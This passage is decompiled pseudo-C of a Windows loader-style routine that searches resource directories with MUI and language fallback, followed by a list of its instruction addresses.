				signed char _t437;
				signed int _t443;
				signed int _t446;
				signed char _t448;
				signed int _t461;
				signed int _t463;
				signed int _t465;
				signed short _t475;
				signed int _t478;
				signed int* _t480;
				signed int _t481;
				signed short _t482;
				signed int _t486;
				signed char _t488;
				signed int _t501;
				signed int _t503;
				signed int _t509;
				signed int _t510;
				signed int _t520;
				signed int _t536;
				signed int _t537;
				signed int _t539;
				signed int _t540;
				signed int _t543;
				signed int _t544;
				signed int _t546;
				signed int _t551;
				signed int _t555;
				void* _t556;
				signed int _t559;
				signed int _t565;
				signed char _t566;
				signed int _t567;
				signed int _t568;
				signed int _t569;
				signed int _t573;
				signed short _t576;
				char _t581;
				signed int _t583;
				signed int _t587;
				signed int _t588;
				signed int _t592;
				signed int _t597;
				intOrPtr _t598;
				signed int _t599;
				signed int _t601;
				signed int* _t602;
				signed int _t607;
				signed int _t615;
				signed int _t617;
				signed int _t620;
				signed int _t624;
				void* _t625;
				signed int _t626;
				signed int _t627;
				intOrPtr* _t630;
				intOrPtr _t633;
				signed int _t638;
				void* _t639;
				signed char _t640;
				intOrPtr* _t642;
				signed int _t645;
				signed int _t647;
				void* _t648;

				_t612 = __edx;
				_push(0xfffffffe);
				_push(0x3296c008);
				_push(0x328dad20);
				_push( *[fs:0x0]);
				_t428 =  *0x3298b370;
				_v12 = _v12 ^ _t428;
				_t429 = _t428 ^ _t647;
				_v32 = _t429;
				_push(_t429);
				 *[fs:0x0] =  &_v20;
				_v28 = _t648 - 0xd0;
				_v100 = __edx;
				_t624 = __ecx;
				_v96 = __ecx;
				_v152 = __edx;
				_v108 = _a12;
				_v92 = __edx;
				_v65 = 0;
				_v172 = 0;
				_v164 = 0;
				_t638 = _a4;
				_t555 = _a8;
				if(_t638 >= 3 || (_t555 & 0x00000002) != 0) {
					if(_t638 > 4) {
						goto L232;
					}
					_t435 = _t555 & 0x00000041;
					if(_t435 == 0 || _t638 == 4) {
						if(_t638 != 4) {
							L9:
							_t565 = _t638;
							_v88 = _t638;
							L10:
							_v124 = _t565;
							_v8 = 0;
							_t437 =  !_t555;
							_v144 = _t437;
							if((_t437 & 0x00000010) == 0) {
								L25:
								_v80 = 1;
								_t566 = _v96;
								_t640 = _t566;
								_v160 = _t566;
								_v120 = 0;
								_t626 = 0;
								_v128 = 0;
								if((_t566 & 0x00000003) != 0) {
									asm("sbb al, al");
									_v80 =  !( ~(_t566 & 0x00000001)) & 0x00000001;
									_v160 = _t640;
								}
								_t612 = E3289E580(1, _t640, 0, 0,  &_v120);
								_t567 = _v120;
								if(_t567 == 0) {
									L76:
									if(_t612 >= 0) {
										L79:
										_v188 = _t626;
										if(_t626 != 0) {
											_t432 = E3289AB70(_t555, _t626, _t640, __eflags, _v96,  &_v172, "true", 1);
											_v72 = _t432;
											__eflags = _t432;
											if(_t432 < 0) {
												L68:
												_v8 = 0xfffffffe;
												goto L233;
											}
											_v148 = _t626;
											_v76 = 0xeeee;
											_v116 = 0;
											_t568 = 0;
											_v136 = 0;
											_v132 = 0;
											_v64 = 0;
											__eflags = 0;
											_v84 = 0;
											_v168 = 0;
											while(1) {
												__eflags = _t626;
												if(_t626 == 0) {
													goto L90;
												}
												_t481 = _v124;
												_t617 = _t481 - 1;
												_v124 = _t617;
												__eflags = _t481;
												if(_t481 == 0) {
													goto L90;
												}
												__eflags = _t617;
												_t612 = _v88;
												if(_t617 == 0) {
													__eflags = _t612 - 3;
													if(_t612 == 3) {
														_v132 = _t626;
													}
												}
												__eflags = _v132;
												if(_v132 == 0) {
													L169:
													_t576 =  *(_t626 + 0xe) & 0x0000ffff;
													_v176 = _t576;
													_v180 =  *(_t626 + 0xc) & 0x0000ffff;
													_t612 = _t576 & 0x0000ffff;
													_t432 = E328894A3( *(_t626 + 0xc) & 0xffff, _t576 & 0x0000ffff,  &_v204);
													_v72 = _t432;
													__eflags = _t432;
													if(_t432 < 0) {
														goto L68;
													}
													_t612 = 8;
													_t432 = L328E6D10(_v204, 8,  &_v220);
													_v72 = _t432;
													__eflags = _t432;
													if(_t432 < 0) {
														goto L68;
													}
													_t612 = _t626 + 0x10;
													_v212 = _t612;
													_t629 = _v96;
													_t581 = (_v96 & 0xfffffffc) + _v172;
													_v140 = _t581;
													__eflags = _v220 + _t612 - _t581;
													if(_v220 + _t612 <= _t581) {
														_t475 = _v180;
														_v144 = _t475;
														_t583 =  *_v100;
														__eflags = _t583 & 0xffff0000;
														if((_t583 & 0xffff0000) == 0) {
															_t612 = _t612 + (_t475 & 0x0000ffff) * 8;
															_v212 = _t612;
															_t475 = _v176;
															_v144 = _t475;
														}
														__eflags = _t475;
														if(_t475 != 0) {
															__eflags = _v132;
															if(_v132 == 0) {
																L206:
																_t612 = _v172;
																_t478 = E328E6E26(_t629, _v172, _v144, _v188, _v172, _t583,  &_v148,  &_v136);
																__eflags = _t478;
																if(_t478 == 0) {
																	goto L172;
																}
																_t480 =  &(_v100[1]);
																_v100 = _t480;
																_v152 = _t480;
																_t626 = _v148;
																_t568 = _v136;
																continue;
															}
															__eflags = _t555 & 0x00000020;
															if((_t555 & 0x00000020) == 0) {
																goto L206;
															}
															_t626 = 0;
															_v148 = 0;
															_v76 =  *_t612;
															_t568 =  *((intOrPtr*)(_t612 + 4)) + _v188;
															__eflags = _t568 - _v140;
															if(_t568 > _v140) {
																goto L172;
															}
															_v136 = _t568;
															goto L90;
														} else {
															_t587 = _v88;
															_t486 = _t587 - _v124 - 1;
															__eflags = _t486;
															if(_t486 == 0) {
																_t645 = 0xc000008a;
																L183:
																_v72 = _t645;
																_t630 = _v92;
																__eflags = _t555 & 0x02040000;
																if((_t555 & 0x02040000) != 0) {
																	L191:
																	__eflags = _t645 - 0xc000008a;
																	if(_t645 == 0xc000008a) {
																		L193:
																		_t488 =  !_t555;
																		__eflags = _t488 & 0x00080000;
																		if((_t488 & 0x00080000) != 0) {
																			__eflags = _t488 & 0x00020000;
																			if((_t488 & 0x00020000) != 0) {
																				__eflags = _t488 & 0x00000010;
																				if((_t488 & 0x00000010) != 0) {
																					__eflags = _t587 - 3;
																					if(_t587 == 3) {
																						_v48 =  *_t630;
																						_v44 =  *((intOrPtr*)(_t630 + 4));
																						_v40 =  *((intOrPtr*)(_t630 + 8));
																						_t588 = _a4;
																						__eflags = _t588 - 4;
																						if(_t588 == 4) {
																							_v36 =  *((intOrPtr*)(_t630 + 0xc));
																						}
																						_t612 =  &_v48;
																						_t558 = _v96;
																						_t645 = L3289B9C0(_v96,  &_v48, _t588, _t555, _v108);
																						_v72 = _t645;
																						__eflags = _t645;
																						if(_t645 >= 0) {
																							_t612 = 0;
																							__eflags = 0;
																							L32890C12(_t558, 0,  &_v48, _a4);
																						}
																					}
																				}
																			}
																		}
																		L201:
																		_v8 = 0xfffffffe;
																		_t432 = _t645;
																		goto L233;
																	}
																	__eflags = _t645 - 0xc000008b;
																	if(_t645 != 0xc000008b) {
																		goto L201;
																	}
																	goto L193;
																}
																__eflags = _t587 - 3;
																if(_t587 != 3) {
																	goto L191;
																}
																_v48 =  *_t630;
																_v44 =  *((intOrPtr*)(_t630 + 4));
																_v40 =  *((intOrPtr*)(_t630 + 8));
																_t592 = _a4;
																__eflags = _t592 - 4;
																if(_t592 == 4) {
																	_v36 =  *((intOrPtr*)(_t630 + 0xc));
																}
																_t612 =  &_v48;
																_t501 = L3289B9C0(_v96,  &_v48, _t592, _t555 | 0x01000000, _v108);
																_t587 = _v88;
																__eflags = _t501 - 0xc00b0001;
																if(_t501 != 0xc00b0001) {
																	__eflags = _t501 - 0xc00b0006;
																	if(_t501 == 0xc00b0006) {
																		goto L191;
																	}
																	_t645 = _t501;
																	L190:
																	_v72 = _t645;
																}
																goto L191;
															}
															_t503 = _t486 - 1;
															__eflags = _t503;
															if(_t503 == 0) {
																_t645 = 0xc000008b;
																goto L183;
															}
															__eflags = _t503 == 1;
															if(_t503 == 1) {
																_v72 = 0xc0000204;
																_v8 = 0xfffffffe;
																_t432 = 0xc0000204;
																goto L233;
															}
															_t645 = 0xc000000d;
															_t630 = _v92;
															goto L190;
														}
													}
													L172:
													_v8 = 0xfffffffe;
													_t432 = 0xc000007b;
													goto L233;
												} else {
													_v64 = 0;
													_t482 =  *((intOrPtr*)(_v92 + 8));
													_v84 = _t482;
													__eflags = 0x000003ff & _t482;
													_v65 = (0x000003ff & _t482) == 0;
													L107:
													_t465 = _v116;
													_v116 = _v116 + 1;
													__eflags = _t465 - 0xc;
													if(_t465 > 0xc) {
														L129:
														_v8 = 0xfffffffe;
														_t432 = 0xc0000204;
														goto L233;
													}
													switch( *((intOrPtr*)(_t465 * 4 +  &M3289D420))) {
														case 0:
															__eflags = 0 - _v84;
															if(0 != _v84) {
																__eflags = _t555 & 0x00080000;
																if((_t555 & 0x00080000) == 0) {
																	goto L139;
																}
																goto L112;
															}
															goto L110;
														case 1:
															__eax = __ebx;
															__eax =  !__ebx;
															__eflags = __eax & 0x00080000;
															if((__eax & 0x00080000) == 0) {
																goto L139;
															}
															__eflags = __eax & 0x00020000;
															if((__eax & 0x00020000) == 0) {
																goto L139;
															}
															__eflags = __al & 0x00000010;
															if((__al & 0x00000010) == 0) {
																goto L139;
															}
															__eax =  *__ecx;
															_v48 =  *__ecx;
															__eflags = __edx - 2;
															if(__edx < 2) {
																__eax = 0;
																__eflags = 0;
															} else {
																__eax =  *(__ecx + 4);
															}
															_v44 = __eax;
															__eflags = __edx - 3;
															if(__edx != 3) {
																__eax = 0;
																__eflags = 0;
															} else {
																__eax =  *(__ecx + 8);
															}
															_v40 = __eax;
															__edi = _a4;
															__eflags = __edi - 4;
															if(__edi == 4) {
																__eax =  *(__ecx + 0xc);
																_v36 =  *(__ecx + 0xc);
															}
															__edx =  &_v48;
															__ecx = _v96;
															__eax = L3289B9C0(__ecx, __edx, __edi, __ebx, _v108);
															__esi = __eax;
															_v72 = __esi;
															__eflags = __esi;
															if(__esi < 0) {
																goto L139;
															} else {
																__eax =  &_v48;
																__edx = 0;
																__ecx = _v96;
																__eax = L32890C12(__ecx, 0,  &_v48, __edi);
																_v8 = 0xfffffffe;
																__eax = __esi;
																goto L233;
															}
														case 2:
															__eflags = _v65;
															if(_v65 == 0) {
																L112:
																_t643 = _v84;
																_v64 = _t643;
																goto L165;
															}
															__si = _v76;
															_v64 = __si;
															goto L165;
														case 3:
															__eflags = __bl & 0x00000004;
															if((__bl & 0x00000004) == 0) {
																__eflags = _v65;
																if(_v65 == 0) {
																	__edx =  &_v64;
																	__eax = E328888C8(__ecx, __edx);
																	__eflags = __eax;
																	if(__eax < 0) {
																		L110:
																		_t643 = 0;
																		_v64 = 0;
																		goto L165;
																	}
																	__si = _v64;
																	__eflags = __si;
																	if(__si != 0) {
																		_v116 = _v116 - 1;
																	}
																	goto L165;
																}
																__si = _v76;
																_v64 = __si;
																goto L165;
															}
															goto L129;
														case 4:
															__eflags = _v65;
															if(_v65 == 0) {
																__si = _v84;
																__si = _v84 & __di;
																_v64 = __si;
															} else {
																__si = _v76;
																_v64 = __si;
															}
															goto L165;
														case 5:
															__eflags = _v65;
															if(_v65 == 0) {
																goto L129;
															}
															goto L139;
														case 6:
															__si = _v76;
															_v64 = __si;
															__eflags = __bl & 0x00000020;
															if((__bl & 0x00000020) != 0) {
																goto L165;
															}
															__eax = 0;
															_v64 = __ax;
															__eax = E3289A630();
															__eflags = __al;
															if(__al == 0) {
																__eax = 0;
																_v64 = __ax;
																__si = _v76;
																_v64 = __si;
																goto L165;
															}
															 *[fs:0x18] =  *( *[fs:0x18] + 0xfc0);
															__eax =  *( *( *[fs:0x18] + 0xfc0) + 4) & 0x0000ffff;
															__eflags = _v164 - __eax;
															if(_v164 >= __eax) {
																__eax = 0;
																__eflags = 0;
																_v64 = __ax;
																L146:
																__ebx = _a8;
																__si = _v76;
																_v64 = __si;
																goto L165;
															}
															__edx =  *[fs:0x18];
															 &_v153 =  &_v64;
															__edi = _v164;
															__edx =  *( *[fs:0x18] + 0xfc0);
															__eax = E3289A750(__edx, __edi,  &_v64,  &_v153);
															__si = _v64;
															__eflags = __si;
															if(__si == 0) {
																goto L146;
															}
															__edi = __edi + 1;
															_v164 = __edi;
															_v116 = _v116 - 1;
															__ebx = _a8;
															goto L165;
														case 7:
															__eax = __ebx;
															__eax =  !__ebx;
															__eflags = __eax & 0x00080000;
															if((__eax & 0x00080000) == 0) {
																L139:
																_t643 = _v76;
																_v64 = _t643;
																goto L165;
															}
															__ecx = _v96;
															__eax = E32898858(__ecx, 0, 1);
															__eflags = __eax;
															if(__eax == 0) {
																goto L139;
															}
															__eflags =  *__eax - 0xfecdfecd;
															if( *__eax != 0xfecdfecd) {
																goto L139;
															}
															__ecx =  *(__eax + 0x7c);
															__eflags = __ecx;
															if(__ecx == 0) {
																goto L139;
															}
															 &_v228 = E328D5050(__ecx,  &_v228,  &_v228);
															 &_v196 =  &_v228;
															__eax = E328B56E0( &_v228,  &_v196);
															__eflags = __al;
															if(__al == 0) {
																goto L139;
															}
															__si = _v196;
															_v64 = __si;
															goto L165;
														case 8:
															__si = _v76;
															_v64 = __si;
															__eax = __ebx;
															__eax =  !__ebx;
															__eflags = __eax & 0x00080000;
															if((__eax & 0x00080000) != 0) {
																goto L164;
															}
															__eflags =  *[fs:0x18];
															if( *[fs:0x18] == 0) {
																__ebx = _a8;
																__si = _v64;
															} else {
																__esi =  *[fs:0x18];
																__si =  *((intOrPtr*)(__esi + 0xc4));
																_v64 = __si;
																__ebx = _a8;
															}
															goto L165;
														case 9:
															__si = _v76;
															_v64 = __si;
															__eax =  &_v168;
															_push( &_v168);
															_push(1);
															__eax = E328D2AE0();
															_v72 = __eax;
															__eflags = __eax;
															if(__eax >= 0) {
																__si = _v168;
																_v64 = __si;
															}
															goto L165;
														case 0xa:
															__si = _v76;
															_v64 = __si;
															__eax =  &_v200;
															_push( &_v200);
															_push(0);
															__eax = E328D2AE0();
															_v72 = __eax;
															__eflags = __eax;
															if(__eax >= 0) {
																__eax = _v200;
																__eflags = __eax - _v168;
																if(__eax != _v168) {
																	__si = __ax;
																	_v64 = __si;
																}
															}
															goto L165;
														case 0xb:
															__esi = 0x409;
															_v64 = __si;
															goto L165;
														case 0xc:
															L164:
															__ebx = __ebx | 0x00000020;
															__eflags = __ebx;
															_a8 = __ebx;
															L165:
															_t468 =  !_t555;
															__eflags = _t468 & 0x00000020;
															if((_t468 & 0x00000020) == 0) {
																L168:
																_v76 = _t643 & 0x0000ffff;
																_t470 =  &_v76;
																_v100 = _t470;
																_v152 = _t470;
																_t626 = _v132;
																_v148 = _t626;
																goto L169;
															}
															__eflags = (_t643 & 0x0000ffff) - _v76;
															if((_t643 & 0x0000ffff) != _v76) {
																goto L168;
															}
															_t612 = _v88;
															L106:
															goto L107;
													}
												}
												L90:
												_t443 = _t555 & 0x00000002;
												__eflags = _t568;
												if(_t568 == 0) {
													L97:
													__eflags = _t626;
													if(_t626 == 0) {
														L100:
														_t612 = _v88;
														_t446 = _t612 - _v124 - 1;
														__eflags = _t446;
														if(_t446 == 0) {
															_t627 = 0xc000008a;
															L210:
															_v72 = _t627;
															L211:
															__eflags = _t555 & 0x02040000;
															if((_t555 & 0x02040000) != 0) {
																L220:
																_t642 = _v92;
																L221:
																__eflags = _t627 - 0xc000008a;
																if(_t627 == 0xc000008a) {
																	L223:
																	_t448 =  !_t555;
																	__eflags = _t448 & 0x00080000;
																	if((_t448 & 0x00080000) == 0) {
																		L231:
																		_v8 = 0xfffffffe;
																		_t432 = _t627;
																		goto L233;
																	}
																	__eflags = _t448 & 0x00020000;
																	if((_t448 & 0x00020000) == 0) {
																		goto L231;
																	}
																	__eflags = _t448 & 0x00000010;
																	if((_t448 & 0x00000010) == 0) {
																		goto L231;
																	}
																	__eflags = _v88 - 3;
																	if(_v88 != 3) {
																		goto L231;
																	}
																	_v48 =  *_t642;
																	_v44 =  *((intOrPtr*)(_t642 + 4));
																	_v40 =  *((intOrPtr*)(_t642 + 8));
																	_t569 = _a4;
																	__eflags = _t569 - 4;
																	if(_t569 == 4) {
																		_v36 =  *((intOrPtr*)(_t642 + 0xc));
																	}
																	_t612 =  &_v48;
																	_t557 = _v96;
																	_t627 = L3289B9C0(_v96,  &_v48, _t569, _t555, _v108);
																	_v72 = _t627;
																	__eflags = _t627;
																	if(_t627 < 0) {
																		goto L231;
																	} else {
																		_t612 = 0;
																		L32890C12(_t557, 0,  &_v48, _a4);
																		_v8 = 0xfffffffe;
																		_t432 = _t627;
																		goto L233;
																	}
																}
																__eflags = _t627 - 0xc000008b;
																if(_t627 != 0xc000008b) {
																	goto L231;
																}
																goto L223;
															}
															__eflags = _t627 - 0xc000008a;
															if(_t627 == 0xc000008a) {
																L214:
																_t642 = _v92;
																__eflags = _t612 - 3;
																if(_t612 == 3) {
																	_v48 =  *_t642;
																	_v44 =  *((intOrPtr*)(_t642 + 4));
																	_v40 =  *((intOrPtr*)(_t642 + 8));
																	_t573 = _a4;
																	__eflags = _t573 - 4;
																	if(_t573 == 4) {
																		_v36 =  *((intOrPtr*)(_t642 + 0xc));
																	}
																	_t612 =  &_v48;
																	_t461 = L3289B9C0(_v96,  &_v48, _t573, _t555 | 0x01000000, _v108);
																	__eflags = _t461 - 0xc00b0001;
																	if(_t461 != 0xc00b0001) {
																		__eflags = _t461 - 0xc00b0006;
																		if(_t461 != 0xc00b0006) {
																			_t627 = _t461;
																			_v72 = _t627;
																		}
																	}
																}
																goto L221;
															}
															__eflags = _t627 - 0xc000008b;
															if(_t627 != 0xc000008b) {
																goto L220;
															}
															goto L214;
														}
														_t463 = _t446 - 1;
														__eflags = _t463;
														if(_t463 == 0) {
															_t627 = 0xc000008b;
															goto L210;
														}
														__eflags = _t463 == 1;
														if(_t463 == 1) {
															_t627 = 0xc0000204;
															_v72 = 0xc0000204;
															__eflags = _v132;
															if(_v132 == 0) {
																goto L211;
															}
															_v136 = 0;
															goto L106;
														}
														_t627 = 0xc000000d;
														goto L210;
													}
													__eflags = _t443;
													if(_t443 == 0) {
														goto L100;
													}
													 *_v108 = _t626;
													_t627 = 0;
													_t612 = _v88;
													goto L210;
												}
												__eflags = _t443;
												if(_t443 != 0) {
													goto L97;
												}
												 *_v108 = _t568;
												_t509 =  *[fs:0x18];
												__eflags =  *(_t509 + 0xfe0);
												if( *(_t509 + 0xfe0) == 0) {
													_v100 =  *[fs:0x18];
													_v100[0x3f8] = L328A5D90(_t568,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, "true");
												}
												_t510 =  *[fs:0x18];
												__eflags =  *(_t510 + 0xfe0);
												if( *(_t510 + 0xfe0) != 0) {
													_t615 = _v96;
													 *( *( *[fs:0x18] + 0xfe0)) = _t615;
													( *( *[fs:0x18] + 0xfe0))[1] = _v136;
													( *( *[fs:0x18] + 0xfe0))[2] = _t615;
												}
												_t627 = 0;
												_v72 = 0;
												_t555 = _a8;
												_t612 = _v88;
												goto L211;
											}
										}
										_v8 = 0xfffffffe;
										_t432 = 0xc0000089;
										goto L233;
									}
									L77:
									_t626 = 0;
									L78:
									_v128 = _t626;
									goto L79;
								}
								_t520 =  *(_t567 + 0x18) & 0x0000ffff;
								_t612 = 0x10b;
								if(_t520 != 0x10b) {
									_t612 = 0x20b;
									__eflags = _t520 - 0x20b;
									if(__eflags != 0) {
										goto L77;
									}
									_t612 = E32887386(_t640, _v80, 2,  &_v180, _t567,  &_v128);
									_t626 = _v128;
									goto L76;
								}
								if( *((intOrPtr*)(_t567 + 0x74)) <= 2) {
									goto L77;
								}
								_t640 =  *(_t567 + 0x88);
								if(_t640 == 0) {
									goto L77;
								}
								_v180 =  *(_t567 + 0x8c);
								if(_v80 != 0 || _t640 <  *((intOrPtr*)(_t567 + 0x54))) {
									_t626 = _v160 + _t640;
									goto L78;
								} else {
									_t597 = _v120;
									_t612 = _t597 + 0x18 + ( *(_t567 + 0x14) & 0x0000ffff);
									_t559 =  *(_t597 + 6) & 0x0000ffff;
									_t598 = 0;
									while(1) {
										_v208 = _t598;
										_v192 = _t612;
										if(_t598 >= _t559) {
											break;
										}
										_t633 =  *((intOrPtr*)(_t612 + 0xc));
										if(_t640 < _t633 || _t640 >=  *((intOrPtr*)(_t612 + 0x10)) + _t633) {
											_t612 = _t612 + 0x28;
											_t598 = _t598 + 1;
											continue;
										} else {
											if(_t612 == 0) {
												break;
											} else {
												_t626 =  *((intOrPtr*)(_t612 + 0x14)) -  *((intOrPtr*)(_t612 + 0xc)) + _t640 + _v160;
												L71:
												_v128 = _t626;
												_t555 = _a8;
												_v100 = _v152;
												if(_t626 == 0) {
													goto L77;
												}
												_t612 = 0;
												goto L76;
											}
										}
									}
									_t626 = 0;
									__eflags = 0;
									goto L71;
								}
							}
							_t26 = _t565 - 1; // 0x2
							if(_t26 > 2) {
								goto L25;
							} else {
								if(_t565 != 3) {
									_t536 = 0;
									__eflags = 0;
								} else {
									_t536 =  *(_t612 + 8) & 0x0000ffff;
								}
								_v120 = _t536;
								_v84 = _t536;
								_t599 =  *_t612;
								if(_t599 == 0x10 || _t599 == 0x18) {
									L20:
									if((_v144 & 0x00000008) == 0 || _t536 != 0 && _t536 != 0x400 && _t536 != 0x800) {
										goto L39;
									} else {
										_t555 = _t555 | 0x00000010;
										_a8 = _t555;
										goto L25;
									}
								} else {
									if((_t599 & 0xffff0000) == 0 || E328D79A0(_t599, L"MUI") != 0) {
										L39:
										_v112 = 0;
										_v140 = 0;
										_v104 = 0;
										_t612 = 0;
										_t537 = E3289D530(_t624, 0, 0, "true");
										_v104 = _t537;
										__eflags = _t537 - 0xffffffff;
										if(_t537 == 0xffffffff) {
											L55:
											_t601 = 0x80000;
											L56:
											_v112 = _t601;
											L57:
											_t555 = _t555 | _t601;
											_a8 = _t555;
											__eflags = _t555 & 0x00040000;
											if((_t555 & 0x00040000) == 0) {
												goto L25;
											}
											_t432 = 0xc000008a;
											_v72 = 0xc000008a;
											__eflags = _t555 & 0x00020000;
											if((_t555 & 0x00020000) == 0) {
												_t602 = _v100;
												_v48 =  *_t602;
												_t620 = _v88;
												__eflags = _t620 - 2;
												if(_t620 < 2) {
													_t539 = 0;
													__eflags = 0;
												} else {
													_t539 = _t602[1];
												}
												_v44 = _t539;
												__eflags = _t620 - 3;
												if(_t620 != 3) {
													_t540 = 0;
													__eflags = 0;
												} else {
													_t540 = _t602[2];
												}
												_v40 = _t540;
												__eflags = _t638 - 4;
												if(_t638 == 4) {
													_v36 = _t602[3];
												}
												_t612 =  &_v48;
												_v72 = L3289B9C0(_t624,  &_v48, _t638, _t555, _v108);
											}
											goto L68;
										}
										__eflags = _t537;
										if(__eflags != 0) {
											L49:
											_push( &_v112);
											_push(_t555);
											_push( *_v100);
											_push(_t537);
											_t543 = E3289E7F0(_t555, _t624, _t638, __eflags);
											__eflags = _t543;
											if(_t543 >= 0) {
												_t544 = _v104;
												_t601 = _v112;
												__eflags =  *(_t544 + 0x14) & 0x00000100;
												if(( *(_t544 + 0x14) & 0x00000100) != 0) {
													_t601 = _t601 | 0x00100000;
													__eflags = _t601;
													_v112 = _t601;
												}
												__eflags =  *(_t544 + 0x10) & 0x00000010;
												if(( *(_t544 + 0x10) & 0x00000010) == 0) {
													goto L57;
												}
												_t601 = _t601 | 0x00200000;
											} else {
												_t601 = 0x60000;
											}
											goto L56;
										}
										_v60 = L"MUI";
										_v56 = 1;
										_v52 = _t537;
										_t546 = E3289C6E0(_t624,  &_v60, 3, 0x2000030,  &_v176);
										_t607 = _t546;
										_v184 = _t607;
										__eflags = _t607;
										if(__eflags >= 0) {
											_t607 = E3289DA30(_t624, _v176,  &_v104,  &_v140);
											_v184 = _t607;
											__eflags = _t607;
											if(__eflags < 0) {
												L46:
												_v104 = 0;
												_t551 = 0xffffffff;
												goto L48;
											}
											_t551 = _v104;
											__eflags =  *_t551 - 0xfecdfecd;
											if(__eflags == 0) {
												_v140 = 0;
												goto L48;
											} else {
												_t607 = 0xc000007b;
												_v184 = 0xc000007b;
												goto L46;
											}
										} else {
											_v104 = 0;
											_t551 = _t546 | 0xffffffff;
											L48:
											_push(0);
											_push(_t607);
											_push(2);
											_push(0);
											_push(_t551);
											_push(0);
											_t612 = 0;
											E328993A6(_t555, _t624, 0, _t624, _t638, __eflags);
											_t537 = _v104;
											__eflags = _t537;
											if(__eflags == 0) {
												goto L55;
											}
											goto L49;
										}
									} else {
										_t536 = _v120;
										goto L20;
									}
								}
							}
						}
						if(_t435 == 0) {
							goto L232;
						}
						if(_t638 != _t638) {
							goto L9;
						} else {
							_t565 = 3;
							_v88 = 3;
							goto L10;
						}
					} else {
						goto L232;
					}
				} else {
					L232:
					_t432 = 0xc00000f1;
					L233:
					 *[fs:0x0] = _v20;
					_pop(_t625);
					_pop(_t639);
					_pop(_t556);
					return E328D4B50(_t432, _t556, _v32 ^ _t647, _t612, _t625, _t639);
				}
			}

0x3289c6e0
0x3289c6e5
0x3289c6e7
0x3289c6ec
0x3289c6f7
0x3289c6fe
0x3289c703
0x3289c706
0x3289c708
0x3289c70e
0x3289c712
0x3289c718
0x3289c71b
0x3289c71e
0x3289c720
0x3289c723
0x3289c72c
0x3289c72f
0x3289c732
0x3289c736
0x3289c740
0x3289c74a
0x3289c74d
0x3289c753
0x3289c761
0x00000000
0x00000000
0x3289c769
0x3289c76c
0x3289c77a
0x3289c792
0x3289c792
0x3289c794
0x3289c797
0x3289c797
0x3289c79a
0x3289c7a3
0x3289c7a5
0x3289c7ad
0x3289c82c
0x3289c82e
0x3289c831
0x3289c834
0x3289c836
0x3289c83c
0x3289c843
0x3289c845
0x3289c84b
0x3289c853
0x3289c859
0x3289c85f
0x3289c85f
0x3289c875
0x3289c877
0x3289c87c
0x3289cb19
0x3289cb1b
0x3289cb22
0x3289cb22
0x3289cb2a
0x3289cb4e
0x3289cb53
0x3289cb56
0x3289cb58
0x3289caba
0x3289caba
0x00000000
0x3289caba
0x3289cb5e
0x3289cb64
0x3289cb6b
0x3289cb72
0x3289cb74
0x3289cb7a
0x3289cb7f
0x3289cb83
0x3289cb85
0x3289cb89
0x3289cb90
0x3289cb90
0x3289cb92
0x00000000
0x00000000
0x3289cb94
0x3289cb99
0x3289cb9a
0x3289cb9d
0x3289cb9f
0x00000000
0x00000000
0x3289cba1
0x3289cba3
0x3289cba6
0x3289cba8
0x3289cbab
0x3289cbad
0x3289cbad
0x3289cbab
0x3289cbb0
0x3289cbb4
0x3289d045
0x3289d045
0x3289d049
0x3289d053
0x3289d060
0x3289d066
0x3289d06b
0x3289d06e
0x3289d070
0x00000000
0x00000000
0x3289d07d
0x3289d088
0x3289d08d
0x3289d090
0x3289d092
0x00000000
0x00000000
0x3289d098
0x3289d09b
0x3289d0a1
0x3289d0a9
0x3289d0af
0x3289d0bd
0x3289d0bf
0x3289d0d2
0x3289d0d8
0x3289d0e2
0x3289d0e4
0x3289d0ea
0x3289d0ef
0x3289d0f2
0x3289d0f8
0x3289d0ff
0x3289d0ff
0x3289d106
0x3289d109
0x3289d238
0x3289d23c
0x3289d270
0x3289d28c
0x3289d294
0x3289d299
0x3289d29b
0x00000000
0x00000000
0x3289d2a4
0x3289d2a7
0x3289d2aa
0x3289d2b0
0x3289d2b6
0x00000000
0x3289d2b6
0x3289d23e
0x3289d241
0x00000000
0x00000000
0x3289d243
0x3289d245
0x3289d24d
0x3289d253
0x3289d259
0x3289d25f
0x00000000
0x00000000
0x3289d265
0x00000000
0x3289d10f
0x3289d10f
0x3289d117
0x3289d117
0x3289d11a
0x3289d150
0x3289d155
0x3289d155
0x3289d158
0x3289d15b
0x3289d161
0x3289d1b4
0x3289d1b4
0x3289d1ba
0x3289d1c4
0x3289d1c6
0x3289d1c8
0x3289d1cd
0x3289d1cf
0x3289d1d4
0x3289d1d6
0x3289d1d8
0x3289d1da
0x3289d1dd
0x3289d1e1
0x3289d1e7
0x3289d1ed
0x3289d1f0
0x3289d1f3
0x3289d1f6
0x3289d1fb
0x3289d1fb
0x3289d203
0x3289d206
0x3289d210
0x3289d212
0x3289d215
0x3289d217
0x3289d221
0x3289d221
0x3289d225
0x3289d225
0x3289d217
0x3289d1dd
0x3289d1d8
0x3289d1d4
0x3289d22a
0x3289d22a
0x3289d231
0x00000000
0x3289d231
0x3289d1bc
0x3289d1c2
0x00000000
0x00000000
0x00000000
0x3289d1c2
0x3289d163
0x3289d166
0x00000000
0x00000000
0x3289d16a
0x3289d170
0x3289d176
0x3289d179
0x3289d17c
0x3289d17f
0x3289d184
0x3289d184
0x3289d193
0x3289d199
0x3289d19e
0x3289d1a1
0x3289d1a6
0x3289d1a8
0x3289d1ad
0x00000000
0x00000000
0x3289d1af
0x3289d1b1
0x3289d1b1
0x3289d1b1
0x00000000
0x3289d1a6
0x3289d11c
0x3289d11c
0x3289d11f
0x3289d149
0x00000000
0x3289d149
0x3289d121
0x3289d124
0x3289d138
0x3289d13b
0x3289d142
0x00000000
0x3289d142
0x3289d126
0x3289d12b
0x00000000
0x3289d12b
0x3289d109
0x3289d0c1
0x3289d0c1
0x3289d0c8
0x00000000
0x3289cbba
0x3289cbbc
0x3289cbc3
0x3289cbc7
0x3289cbd0
0x3289cbd3
0x3289cce1
0x3289cce1
0x3289cce4
0x3289cce7
0x3289ccea
0x3289cdcc
0x3289cdcc
0x3289cdd3
0x00000000
0x3289cdd3
0x3289ccf0
0x00000000
0x3289ccf9
0x3289ccfd
0x3289cd0a
0x3289cd10
0x00000000
0x00000000
0x00000000
0x3289cd10
0x00000000
0x00000000
0x3289cd23
0x3289cd25
0x3289cd27
0x3289cd2c
0x00000000
0x00000000
0x3289cd32
0x3289cd37
0x00000000
0x00000000
0x3289cd3d
0x3289cd3f
0x00000000
0x00000000
0x3289cd45
0x3289cd47
0x3289cd4a
0x3289cd4d
0x3289cd54
